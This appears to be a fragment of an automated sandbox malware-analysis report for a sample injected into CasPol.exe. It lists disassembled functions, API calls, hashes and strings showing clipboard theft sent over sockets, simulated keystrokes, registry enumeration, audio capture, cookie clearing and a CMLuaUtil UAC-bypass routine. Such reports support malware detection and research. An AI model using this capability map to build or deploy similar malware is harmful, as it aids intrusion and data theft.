                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                                                                                  • __freea.LIBCMT ref: 00449B47
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • __freea.LIBCMT ref: 00449B50
                                                                                                                  • __freea.LIBCMT ref: 00449B75
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3864826663-0
                                                                                                                  • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                                  • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                                                                                                  • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                                  • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                                                                                  APIs
                                                                                                                  • SendInput.USER32 ref: 00418B18
                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                                                                                    • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InputSend$Virtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1167301434-0
                                                                                                                  • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                  • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                                  • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                  • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32 ref: 00415A46
                                                                                                                  • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                  • OpenClipboard.USER32 ref: 00415A61
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                  • CloseClipboard.USER32 ref: 00415A89
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2172192267-0
                                                                                                                  • Opcode ID: bde6039006afd35cfa9b038592cd02174a0e4c19d1e344a24b2e8258caee1819
                                                                                                                  • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                  • Opcode Fuzzy Hash: bde6039006afd35cfa9b038592cd02174a0e4c19d1e344a24b2e8258caee1819
                                                                                                                  • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16
                                                                                                                  • String ID: a/p$am/pm$fD
                                                                                                                  • API String ID: 3509577899-1143445303
                                                                                                                  • Opcode ID: b7a8f278bf47528e4a7b6c0293cf3492489fb7de6840faf8b14e2fc4a7d4cdfd
                                                                                                                  • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                  • Opcode Fuzzy Hash: b7a8f278bf47528e4a7b6c0293cf3492489fb7de6840faf8b14e2fc4a7d4cdfd
                                                                                                                  • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 269201875-0
                                                                                                                  • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                  • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                  • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                  • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • _free.LIBCMT ref: 00444096
                                                                                                                  • _free.LIBCMT ref: 004440AD
                                                                                                                  • _free.LIBCMT ref: 004440CC
                                                                                                                  • _free.LIBCMT ref: 004440E7
                                                                                                                  • _free.LIBCMT ref: 004440FE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                  • String ID: Z7D
                                                                                                                  • API String ID: 3033488037-2145146825
                                                                                                                  • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                  • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                  • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                  • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                  APIs
                                                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                  • __fassign.LIBCMT ref: 0044A190
                                                                                                                  • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1324828854-0
                                                                                                                  • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                  • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                  • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                  • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                  APIs
                                                                                                                  • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                    • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                    • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                    • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                    • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                    • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                  • String ID: T=G$>G$>G
                                                                                                                  • API String ID: 1596592924-1617985637
                                                                                                                  • Opcode ID: 3fec3df3ea753e99a4d7dc9a7f1cf411dfa94176a259d892051fe4c4deaceef9
                                                                                                                  • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                                  • Opcode Fuzzy Hash: 3fec3df3ea753e99a4d7dc9a7f1cf411dfa94176a259d892051fe4c4deaceef9
                                                                                                                  • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                    • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                    • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                  • String ID: TUFTUF$>G$DG$DG
                                                                                                                  • API String ID: 3114080316-344394840
                                                                                                                  • Opcode ID: 2ba61fc1b2277f262010f0e17440aec044fc634041d42f3fb681f5f0ad845f97
                                                                                                                  • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                                  • Opcode Fuzzy Hash: 2ba61fc1b2277f262010f0e17440aec044fc634041d42f3fb681f5f0ad845f97
                                                                                                                  • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                  • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                                  • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                  • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                                  • Opcode ID: a32d57285e98fe8185e522098f46dc5f38963afb01a16617e9d2f967551b33e0
                                                                                                                  • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                                                                                  • Opcode Fuzzy Hash: a32d57285e98fe8185e522098f46dc5f38963afb01a16617e9d2f967551b33e0
                                                                                                                  • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 893373978a8f63a806f149930d37a519c5179eb32fa122ac40cbdb5ec79234b4
                                                                                                                  • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                                                                                  • Opcode Fuzzy Hash: 893373978a8f63a806f149930d37a519c5179eb32fa122ac40cbdb5ec79234b4
                                                                                                                  • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                                                                                  APIs
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                  • int.LIBCPMT ref: 0040FC0F
                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                  • String ID: p[G
                                                                                                                  • API String ID: 2536120697-440918510
                                                                                                                  • Opcode ID: 21b0a4efc7602d160aff57bcb0434e0537ff44c0ab5ab895835da1e08b7de2e9
                                                                                                                  • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                                                                                  • Opcode Fuzzy Hash: 21b0a4efc7602d160aff57bcb0434e0537ff44c0ab5ab895835da1e08b7de2e9
                                                                                                                  • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                  • _free.LIBCMT ref: 0044FD39
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 0044FD44
                                                                                                                  • _free.LIBCMT ref: 0044FD4F
                                                                                                                  • _free.LIBCMT ref: 0044FDA3
                                                                                                                  • _free.LIBCMT ref: 0044FDAE
                                                                                                                  • _free.LIBCMT ref: 0044FDB9
                                                                                                                  • _free.LIBCMT ref: 0044FDC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                  • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                                  • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                  • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                                                  • _free.LIBCMT ref: 10009315
                                                                                                                  • _free.LIBCMT ref: 10009320
                                                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                                                  • _free.LIBCMT ref: 10009336
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                  APIs
                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                                    • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                    • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                  • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                  • API String ID: 3851391207-2637227304
                                                                                                                  • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                  • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                  • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                  • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                  APIs
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                  • int.LIBCPMT ref: 0040FEF2
                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FF2E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
Strings
Memory Dump Source
